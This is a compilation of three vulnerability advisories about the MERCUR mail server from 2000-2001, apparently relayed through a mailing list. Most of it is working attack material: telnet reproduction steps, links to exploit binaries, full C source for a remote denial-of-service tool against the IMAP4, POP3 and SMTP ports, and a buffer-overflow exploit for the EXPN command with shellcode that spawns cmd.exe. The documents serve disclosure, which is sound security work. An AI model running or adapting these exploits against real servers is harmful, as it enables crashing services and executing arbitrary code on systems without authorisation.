Title 15/3/2000 Mercur POP3 / IMAP server vulnerable to DoS Summary UssrLabs found that the <http://www.atrium-software.com/mercur/mercur_e.html> Mercur POP3 and IMAP Server is vulnerable to a Denial of Service attack. The attack is possible due to improper bounds checking. Details Vulnerable systems: MERCUR Mailserver 3.2 MERCUR POP3-Server (v3.20.01) for Windows NT MERCUR IMAP4-Server (v3.20.01) for Windows NT Example: $ telnet example.com 110 Trying example.com... Connected to example.com. Escape character is '^]'. +OK MERCUR POP3-Server (v3.20.01 Unregistered) for Windows NT ready at Tue, 14 M at 2000 03:30:39 -0300 user [buffer] Where [buffer] is approximately 2000 characters. $ telnet example.com 143 Trying example.com... Connected to example.com. Escape character is '^]'. * OK MERCUR IMAP4-Server (v3.20.01 Unregistered) for Windows NT ready at Tue, 14 Mar 2000 03:34:09 -0300 [buffer] Where [buffer] is approximately 3000 characters. Exploit: Binary version of the POP3 DoS: <http://www.ussrback.com/mercur/domrc32p.exe> http://www.ussrback.com/mercur/domrc32p.exe Binary version of the IMAP DoS: <http://www.ussrback.com/mercur/domrc32i.exe> http://www.ussrback.com/mercur/domrc32i.exe Source code: <http://www.ussrback.com/mercur/merc32ds.zip> http://www.ussrback.com/mercur/merc32ds.zip Additional information The information was provided by: <mailto:labs%20at%20USSRBACK.COM> Ussr Labs. Title 14/6/2000 Mercur Mail server large buffer exploit code has been released Summary We already reported about the vulnerability in Mercur Mail server: <http://www.securiteam.com/exploits/Mercur_POP3___IMAP_server_vulnerable _to_DoS.html> Mercur POP3 / IMAP server vulnerable to DoS). Now an exploit source code has been created to test for this vulnerability. Details Vulnerable systems: MERCUR Mailserver 3.2 Exploit: /* * Remote Denial of Service for Mercur 3.2 * * (C) |[TDP]| - HaCk-13 TeaM - 2000 <tdp@xxxxxxxxxx> * * * This code shows a Mercur 3.2 vulnerability in which, any remote * user can cause server shutdown. Previous Mercur versions may be * affected by this vulnerability. * * Greetings to all the other members and all my friends :) */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sys/socket.h> #include <sys/types.h> #include <netdb.h> #include <netinet/in.h> #include <arpa/inet.h> void usage (char *progname) { fprintf (stderr, "Usage: %s <hostname> [type]\n", progname); fprintf (stderr, " Type:\n"); fprintf (stderr, " 0 - IMAP4 (Default)\n"); fprintf (stderr, " 1 - POP3\n"); fprintf (stderr, " 2 - SMTP\n\n"); exit (1); } int main (int argc, char **argv) { char *ptr, buffer[3000], remotedos[3100]; int aux, sock, type; struct sockaddr_in sin; unsigned long ip; struct hostent *he; fprintf (stderr, "\n-= Remote DoS for Mercur 3.2 - (C) |[TDP]| - H13 Team =-\n"); if (argc < 2) usage (argv[0]); type = 0; if (argc > 2) type = atol (argv[2]); ptr = buffer; switch (type) { case 1: memset (ptr, 0, 2048); memset (ptr, 88, 2046); break; default: memset (ptr, 0, sizeof (buffer)); memset (ptr, 88, sizeof (buffer) - 2); break; } bzero (remotedos, sizeof (remotedos)); switch (type) { case 1: snprintf (remotedos, sizeof (remotedos), "USER %s\r\n\r\n\r\n", buffer); break; case 2: snprintf (remotedos, sizeof (remotedos), "MAIL FROM: %s@xxxxxxxxxxxxxx\r\n\r\n\r\n", buffer); break; default: snprintf (remotedos, sizeof (remotedos), "1000 LOGIN %s\r\n\r\n\r\n", buffer); break; } if ((sock = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) { perror ("socket()"); return -1; } if ((he = gethostbyname (argv[1])) != NULL) { ip = *(unsigned long *) he->h_addr; } else { if ((ip = inet_addr (argv[1])) == NULL) { perror ("inet_addr()"); return -1; } } sin.sin_family = AF_INET; sin.sin_addr.s_addr = ip; switch (type) { case 1: sin.sin_port = htons (110); break; case 2: sin.sin_port = htons (25); break; default: sin.sin_port = htons (143); break; } if (connect (sock, (struct sockaddr *) &sin, sizeof (sin)) < 0) { perror ("connect()"); return -1; } switch (type) { case 1: fprintf (stderr, "\nEngaged Mercur POP3... Sending data...\n"); break; case 2: fprintf (stderr, "\nEngaged Mercur SMTP... Sending data...\n"); break; default: fprintf (stderr, "\nEngaged Mercur IMAP4... Sending data...\n"); break; } if (write (sock, remotedos, strlen (remotedos)) < strlen (remotedos)) { perror ("write()"); return -1; } sleep (4); fprintf (stderr, "Bye Bye baby!...\n\n"); if (close (sock) < 0) { perror ("close()"); return -1; } return (0); } Additional information The information has been provided by: <mailto:tdp%20at%20PSYNET.NET> |[TDP]| Title 1/3/2001 MERCUR Mailserver Buffer Overflow Vulnerability (EXPN) Summary <http://www.atrium-software.com/mercur/mercur_e.html> MERCUR offers the necessary features to provide an efficient and effective communications medium. A security vulnerability in the product allows remote attackers to cause the product to crash causing it to execute arbitrary code. Details Vulnerable systems: MERCUR Mailserver version 3.3 Example: < 220 MERCUR SMTP-Server (v3.30.03 Unregistered) for Windows NT ready at Thu, 15 Feb 2001 03:55:34 -0800 > EXPN AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAA Connection to host lost. Exploit: This exploit runs an instance of cmd.exe on target host: /* MERCUR Mailserver 3.3 Remote Buffer Overflow Tested on Win2K AS SP1 with MERCUR SMTP- Server v3.30.03 Martin Rakhmanoff martin@xxxxxxxxxxxxx */ #include <winsock2.h> #include <stdio.h> /* \x63\x6D\x64\x2E\x65\x78\x65 - simply 'cmd.exe' */ char shellcode[] = "\x8B\xC4\x83\xC0\x17\x50\xB8\x0E\xB5\xE9\x77 \xFF\xD0\x33\xDB\x53" "\xB8\x2D\xF3\xE8\x77\xFF\xD0\x63\x6D\x64 \x2E\x65\x78\x65\x0D\x0A"; /* In SoftICE bpx 001b:00418b65 - here eip is restored with overwritten value... */ int main(int argc, char * argv[]){ int i; char sploit[512]; char buffer[512]; WSADATA wsaData; SOCKET sock; struct sockaddr_in server; struct hostent *hp; WSAStartup(0x202,&wsaData); hp = gethostbyname("arena"); memset(&server,0,sizeof(server)); memcpy(&(server.sin_addr),hp->h_addr,hp- >h_length); server.sin_family = hp->h_addrtype; server.sin_port = htons(25); sock = socket(AF_INET,SOCK_STREAM,0); connect(sock,(struct sockaddr*)&server,sizeof (server)); sploit[0]='E'; sploit[1]='X'; sploit[2]='P'; sploit[3]='N'; sploit[4]=0x20; for(i=5;i<137;i++){ sploit[i]=0x41; } // Return address //77E87D8B sploit[137]=0x8B; sploit[138]=0x89; sploit[139]=0xE8; sploit[140]=0x77; for(i=0;i<sizeof(shellcode);i++){ sploit[i+141]=shellcode[i]; } recv(sock,buffer,512,0); send(sock,sploit,173,0); closesocket(sock); WSACleanup(); return 0; } Vendor Status: Vendor was notified, and is working on a solution. Additional information The information has been provided by <mailto:martin%20at%20DIRECT.SPB.RU> Martin NA. ---> Shaka( Rudy) Helpc list owner <mailto:shaka.rudy@xxxxxxxxx> shaka.rudy@xxxxxxxxx